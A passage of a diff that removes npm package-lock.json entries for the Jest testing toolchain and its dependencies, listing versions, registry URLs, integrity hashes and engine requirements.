"2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.11.0", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.11.0.tgz", - "integrity": "sha512-RRjxlvLDkD1YJwDbroBHMb+cukurkDWNyHx7D3oNB5x9rb5ogcksMC5wHCadcXoo67gVr/+3GFySh3134zi6rw==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.3.1.tgz", - "integrity": "sha512-6iWfL5DTT0Np6UYs/y5Niu7WIfNv/wRTtN5RSXt2DIEft3dx3zPuw/3WJQBCJfmEzvDiEKwoqMbGD9n49+qLSA==", - "dev": true, - "dependencies": { - "@jest/core": "^29.3.1", - "@jest/types": "^29.3.1", - "import-local": "^3.0.2", - "jest-cli": "^29.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.4.0.tgz", - "integrity": "sha512-rnI1oPxgFghoz32Y8eZsGJMjW54UlqT17ycQeCEktcxxwqqKdlj9afl8LNeO0Pbu+h2JQHThQP0BzS67eTRx4w==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.4.1.tgz", - "integrity": "sha512-v02NuL5crMNY4CGPHBEflLzl4v91NFb85a+dH9a1pUNx6Xjggrd8l9pPy4LZ1VYNRXlb+f65+7O/MSIbLir6pA==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.4.1.tgz", - "integrity": "sha512-jz7GDIhtxQ37M+9dlbv5K+/FVcIo1O/b1sX3cJgzlQUf/3VG25nvuWzlDC4F1FLLzUThJeWLu8I7JF9eWpuURQ==", - "dev": true, - "dependencies": { - "@jest/core": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.4.1.tgz", - "integrity": "sha512-g7p3q4NuXiM4hrS4XFATTkd+2z0Ml2RhFmFPM8c3WyKwVDNszbl4E7cV7WIx1YZeqqCtqbtTtZhGZWJlJqngzg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.4.1", - "@jest/types": "^29.4.1", - "babel-jest": "^29.4.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.4.1", - "jest-environment-node": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.4.1.tgz", - "integrity": "sha512-uazdl2g331iY56CEyfbNA0Ut7Mn2ulAG5vUaEHXycf1L6IPyuImIxSz4F0VYBKi7LYIuxOwTZzK3wh5jHzASMw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.3.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.2.0.tgz", - "integrity": "sha512-bkxUsxTgWQGbXV5IENmfiIuqZhJcyvF7tU4zJ/7ioTutdz4ToB5Yx6JOFBpgI+TphRY4lhOyCWGNH/QFQh5T6A==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.4.1.tgz", - "integrity": "sha512-QlYFiX3llJMWUV0BtWht/esGEz9w+0i7BHwODKCze7YzZzizgExB9MOfiivF/vVT0GSQ8wXLhvHXh3x2fVD4QQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "jest-util": "^29.4.1", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.4.1.tgz", - "integrity": "sha512-x/H2kdVgxSkxWAIlIh9MfMuBa0hZySmfsC5lCsWmWr6tZySP44ediRKDUiNggX/eHLH7Cd5ZN10Rw+XF5tXsqg==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.4.1.tgz", - "integrity": "sha512-akpZv7TPyGMnH2RimOCgy+hPmWZf55EyFUvymQ4LMsQP8xSPlZumCPtXGoDhFNhUE2039RApZkTQDKU79p/FiQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.4.1.tgz", - "integrity": "sha512-k5h0u8V4nAEy6lSACepxL/rw78FLDkBnXhZVgFneVpnJONhb2DhZj/Gv4eNe+1XqQ5IhgUcqj745UwH0HJmMnA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.4.1.tgz", - "integrity": "sha512-H4/I0cXUaLeCw6FM+i4AwCnOwHRgitdaUFOdm49022YD5nfyr8C/DrbXOBEyJaj+w/y0gGJ57klssOaUiLLQGQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.4.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.4.1.tgz", - "integrity": "sha512-MwA4hQ7zBOcgVCVnsM8TzaFLVUD/pFWTfbkY953Y81L5ret3GFRZtmPmRFAjKQSdCKoJvvqOu6Bvfpqlwwb0dQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.4.1.tgz", - "integrity": "sha512-j/ZFNV2lm9IJ2wmlq1uYK0Y/1PiyDq9g4HEGsNTNr3viRbJdV+8Lf1SXIiLZXFvyiisu0qUyIXGBnw+OKWkJwQ==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.4.1.tgz", - "integrity": "sha512-Y3QG3M1ncAMxfjbYgtqNXC5B595zmB6e//p/qpA/58JkQXu/IpLDoLeOa8YoYfsSglBKQQzNUqtfGJJT/qLmJg==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.2.0", - "jest-snapshot": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.4.1.tgz", - "integrity": "sha512-8d6XXXi7GtHmsHrnaqBKWxjKb166Eyj/ksSaUYdcBK09VbjPwIgWov1VwSmtupCIz8q1Xv4Qkzt/BTo3ZqiCeg==", - "dev": true, - "dependencies": { - "@jest/console": "^29.4.1", - "@jest/environment": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.2.0", - "jest-environment-node": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-leak-detector": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-resolve": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-util": "^29.4.1", - "jest-watcher": "^29.4.1", - "jest-worker": "^29.4.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.4.1.tgz", - "integrity": "sha512-UXTMU9uKu2GjYwTtoAw5rn4STxWw/nadOfW7v1sx6LaJYa3V/iymdCLQM6xy3+7C6mY8GfX22vKpgxY171UIoA==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/globals": "^29.4.1", - "@jest/source-map": "^29.2.0", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "semver": "^7.3.5", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-runtime/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - 